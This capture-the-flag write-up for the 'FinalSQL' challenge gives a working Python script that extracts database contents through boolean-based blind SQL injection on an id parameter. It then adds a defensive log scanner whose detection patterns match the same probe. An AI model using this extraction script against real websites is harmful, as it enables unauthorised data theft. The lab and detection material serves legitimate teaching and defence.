FinalSQL

There is an id parameter, and it looks just like a blind injection.

exp:

import requests

# Challenge instance URL from the original writeup.
URL = "http://a10fc172-5571-460a-9f76-93eb2e9486fd.node3.buuoj.cn/search.php"

# Boolean-based blind injection through the id parameter. The payload
# 1^(cond)^1 evaluates to 1 when cond is true and to 0 when it is false,
# so every request leaks one bit through the page content. Following the
# branch logic of the original script, this marker is present when the
# condition holds.
MARKER = "NO! Not t"


def extract(query, max_len=255):
    """Recover the result of `query` one position at a time, binary searching
    the printable ASCII range 32..126 for the character at each position."""
    result = ""
    session = requests.Session()  # reuse the connection across many probes
    for i in range(1, max_len + 1):
        left, right = 32, 127
        while left < right:
            mid = (left + right) // 2
            sql = "1^(ord(substr((%s),%d,1))>%d)^1" % (query, i, mid)
            response = session.get(URL, params={"id": sql})
            if MARKER not in response.text:
                right = mid       # condition false: ord <= mid
            else:
                left = mid + 1    # condition true: ord > mid
        # left == right is now the character code at position i. Once the
        # query result is exhausted, substr() returns '' and ord('') is 0,
        # so the search bottoms out at 32 (a space) for every later position.
        result += chr(left)
        print(result)
    return result


if __name__ == "__main__":
    extract("select(group_concat(schema_name))from(information_schema.schemata)")

Dump the database names

Dump the table names

Dump the columns

Get the flag

Then I found out I had dumped the wrong table, lol......
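As an added defender-side example (not part of the original writeup), the following Python scans web access-log lines for the shape of probe used above: an id parameter that should be a bare integer but carries the XOR operator, ord(/substr( or information_schema, and then counts flagged requests per client, since a character-by-character binary search produces a burst from one source. The log lines, IPs and timestamps are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache common-log-format lines (not real traffic). Lines 3 and 4
# carry the XOR-style blind probe shape, percent-encoded as a browser/client would send it.
SAMPLE_LOG = r"""
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?id=2 HTTP/1.1" 200 498
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?id=1%5E(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))%3E79)%5E1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?id=1%5E(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))%3E103)%5E1 HTTP/1.1" 200 498
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?id=abc HTTP/1.1" 200 498
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

# Markers of a boolean/XOR blind probe inside a parameter that must be an integer.
INJECTION_MARKERS = re.compile(
    r"\^|\bord\(|\bsubstr\(|\binformation_schema\b|\bselect\b", re.IGNORECASE
)


def classify_id(value):
    """'ok' for a plain integer, 'blind-sqli' when injection markers appear, else 'malformed'."""
    if re.fullmatch(r"\d+", value):
        return "ok"
    if INJECTION_MARKERS.search(value):
        return "blind-sqli"
    return "malformed"


def scan_log(text):
    """Return (ip, verdict, decoded_id) for every request whose id is not a plain integer."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than crash the scan
        query = parse_qs(urlsplit(m.group("target")).query)  # parse_qs percent-decodes
        for value in query.get("id", []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((m.group("ip"), verdict, value))
    return findings


def flagged_per_source(text):
    """Count blind-SQLi verdicts per client IP; a binary search shows up as a burst from one source."""
    counts = {}
    for ip, verdict, _ in scan_log(text):
        if verdict == "blind-sqli":
            counts[ip] = counts.get(ip, 0) + 1
    return counts
```

Feeding real logs through scan_log and alerting when flagged_per_source exceeds a small threshold per path catches the extraction loop early, since every recovered character costs the attacker several requests.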
